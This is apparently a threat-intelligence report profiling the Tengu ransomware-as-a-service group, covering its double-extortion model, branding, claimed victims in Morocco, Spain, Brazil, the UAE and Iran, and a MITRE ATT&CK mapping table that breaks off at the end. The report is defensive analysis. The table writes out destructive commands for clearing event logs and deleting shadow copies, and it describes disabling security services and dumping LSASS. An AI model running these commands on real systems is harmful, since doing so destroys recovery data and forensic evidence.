A new and highly-active Ransomware-as-a-Service (RaaS) operation known as “Tengu” was first observed in October 2025. Classified as an Organized Crime group, Tengu conducts “hands-on,” operator-driven intrusions. The group executes a classic double-extortion model: exfiltrating sensitive data prior to encryption and then directing victims to Tor-based negotiation portals. If ransom demands are not met, the stolen data is leaked on a public blog.
Tengu’s tradecraft is defined by a deep reliance on “living-off-the-land” (LOLBin) techniques. Operators leverage trusted, signed Microsoft binaries—including PowerShell, cmd.exe, and rundll32.exe—to execute malicious payloads stealthily. This methodology is deliberately chosen to bypass common, signature-based endpoint protection and blend in with “routine administration”.
The emergence of Tengu is not an isolated event. It is a direct symptom of the 2025 threat landscape, which has seen significant law enforcement disruption of major RaaS players like LockBit and ALPHV/BlackCat. This has created a “fragmented ransomware ecosystem” and a power vacuum. Tengu is part of a “new wave” of RaaS operations competing to fill this void and recruit “orphaned” affiliates.
This “hands-on” approach, combined with LOLBin abuse, suggests a specific targeting strategy. The group’s TTPs are designed to defeat organizations that have invested in standard, signature-based security tools but lack the mature 24/7 Security Operations Center (SOC) monitoring or advanced behavioral analytics required to detect a human operator using legitimate tools in an anomalous way. This is further supported by Tengu’s atypical victimology, which shows a notable geographic focus on regions such as Morocco, Iran, the United Arab Emirates (UAE), Spain, and Brazil.
Actor Profile
Identity and Operations
Tengu is a Ransomware-as-a-Service (RaaS) operation that surfaced in October 2025 as a new entrant in the organized crime landscape. As a RaaS provider, the Tengu “core” team likely develops and maintains the ransomware payload, exfiltration infrastructure, and negotiation portals, while leasing this platform to affiliated operators who conduct the intrusions.
The group’s operational model is “hands-on” and follows a double-extortion playbook. Operators first gain access, then perform manual reconnaissance, lateral movement, and data exfiltration. Only after sensitive data has been secured do they deploy the encryptor. Victims are then directed to a Tor-based chat portal for ransom negotiations. Failure to pay results in a public “naming and shaming” and the leaking of stolen data on the group’s “TENGU Blog Leaks” site.
Brand and Naming
The group’s name is a deliberate and insightful choice. “Tengu” are drawn from Japanese folklore, described as “mischievous, part-human, part-avian spirits”. These mythological beings are defined by a “dual nature,” capable of acting as both “malevolent demons” and “tutelary deities”.
This branding is not arbitrary; it serves as a psychological and recruitment tool.
- A Brand of “Elite” Skill: In mythology, Tengu are “renowned swordsmen” and are said to have taught military arts. They are also strongly associated with arrogance and pride; the Japanese expression tengu ni naru (“becoming a tengu”) is used to describe a “conceited person”. This self-perception as elite, skilled “swordsmen” aligns perfectly with the group’s “hands-on,” operator-driven TTPs. This branding is designed to attract skilled affiliates who share this self-image of being a cut above common, automated attackers.
- A Brand of Deception: The “mischievous” and “trickster” nature of the Tengu, who “create illusions” and “play tricks”, is a direct parallel to the group’s core technical strategy. Tengu’s primary TTP is the use of legitimate, signed Microsoft binaries to execute malicious code. The explicit purpose is to “appear as routine administration” and have their malicious actions “treated as benign”. The group’s name is a direct reflection of its operational philosophy: achieving deception through legitimacy, acting as the “mischievous spirit” hiding within the machine’s routine processes.
Victims and Targeting
Documented Victims
As of late October 2025, Tengu has publicly claimed at least seven victims, with six identified across a diverse range of sectors and geographies.
- STAR LÉGUMES (Morocco): An agricultural wholesale company based in Casablanca. Following the October 2025 attack and failed negotiations, Tengu published 13 images of internal company documents as proof. This leak post alone garnered over 1,000 views, demonstrating the significant operational and reputational damage inflicted.
- FOOD & MUSIC MANAGEMENT SL (Spain): A leading company in Spain’s hospitality and entertainment sector. Claimed on October 23, 2025.
- Le MULTI LABORATOIRE LC2A (Morocco): An analytical services laboratory. Claimed on October 24, 2025.
- UniCursos (Brazil): An education company specializing in public sector exam preparation. Claimed on October 23, 2025.
- Al Rimal Group (UAE): A food product manufacturing company. Claimed on October 23, 2025.
- Qatargas and Tar Company (Iran): An industrial gas and tar provider for the petrochemical (Energy) sector. Claimed on October 23, 2025.
Targeting Strategy
Analysis of Tengu’s victim list reveals a sophisticated, two-pronged strategy.
First, the group’s geographic targeting represents a deliberate “blue ocean” strategy. The victim list is not dominated by North American or Western European targets, which remain the “epicenter” for most RaaS activity. Instead, Tengu has focused on Morocco, Iran, the UAE, and Brazil. This suggests a strategic calculation to avoid the hyper-competitive and more heavily defended US market. These targeted regions are centers of rapid economic growth and digitization, but their cybersecurity maturity, regulatory enforcement, and 24/7 monitoring capabilities may lag. Tengu is applying its “hands-on” TTPs to “softer” enterprise targets that are wealthy enough to pay but not defended well enough to stop a human-driven, LOLBin-based attack.
Second, while its geography is novel, its sector targeting is classic RaaS tradecraft. Ransomware groups have long favored industries with “minimal tolerance for downtime”. Tengu’s victim list includes Energy, Agriculture/Food Production, and Manufacturing. These are all time-sensitive, critical infrastructure, and industrial sectors where operational downtime is catastrophic. An energy provider cannot be offline, an agricultural wholesaler deals with perishable goods, and a manufacturing plant loses revenue by the minute. This choice of sector, combined with the double-extortion data leak, creates immense psychological pressure on victims and increases the likelihood of a ransom payment.
Technical Analysis: The Attack Chain
Tengu’s intrusions are “operator-driven,” blending stealth, defense evasion, and anti-forensic techniques. The following table maps their known TTPs to the MITRE ATT&CK framework, followed by a narrative breakdown of the attack chain.
Table 1: Tengu TTPs Mapped to MITRE ATT&CK
| Tactic | Technique (ID) | Technique Name | Tengu’s Implementation (What to Expect) |
| Initial Access | T1078 / T1133 | Valid Accounts / External Remote Services | Operator-driven intrusion leveraging stolen credentials for exposed RDP/VPN services. |
| T1190 / T1566 | Exploit Public-Facing Application / Phishing | Exploitation of unpatched applications and targeted phishing for initial footholds. | |
| Execution | T1059.001 /.003 | Command and Scripting Interpreter: PowerShell / Windows Command Shell | Use of powershell.exe and cmd.exe to run malicious commands and payloads. |
| T1218.011 | System Binary Proxy Execution: Rundll32 | rundll32.exe is used to execute malicious payloads in memory, blending in with benign system activity. | |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | Dumping the LSASS process memory to harvest clear-text passwords and hashes. |
| Defense Evasion | T1562.001 /.004 | Impair Defenses: Disable or Modify Tools / Disable or Modify System Firewall | Disables security and update services (e.g., wscsvc, wuauserv) to blind EDR/AV. |
| T1070.001 | Indicator Removal: Clear Windows Event Logs | wevtutil cl * is used to erase evidence of the intrusion, hampering forensic analysis. | |
| Discovery | T1018 / T1046 | Remote System Discovery / Network Service Scanning | Standard network/service discovery and Active Directory recon to map the environment. |
| Lateral Movement | T1021 | Remote Services | Operator-driven movement using compromised admin credentials via SMB/WMI/PsExec. |
| Collection | T1074.001 | Data Staged: Local Data Staging | Data is collected and compressed in a central location before exfiltration. |
| Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Use of legitimate tools like Rclone or WinSCP to exfiltrate data to cloud services (e.g., MEGA). |
| T1041 | Exfiltration Over C2 Channel | Bulk data transfer over encrypted channels. | |
| Impact | T1490 | Inhibit System Recovery | vssadmin delete shadows /all /quiet is used to delete Volume Shadow Copies. |
| T1486 | Data Encrypted for Impact |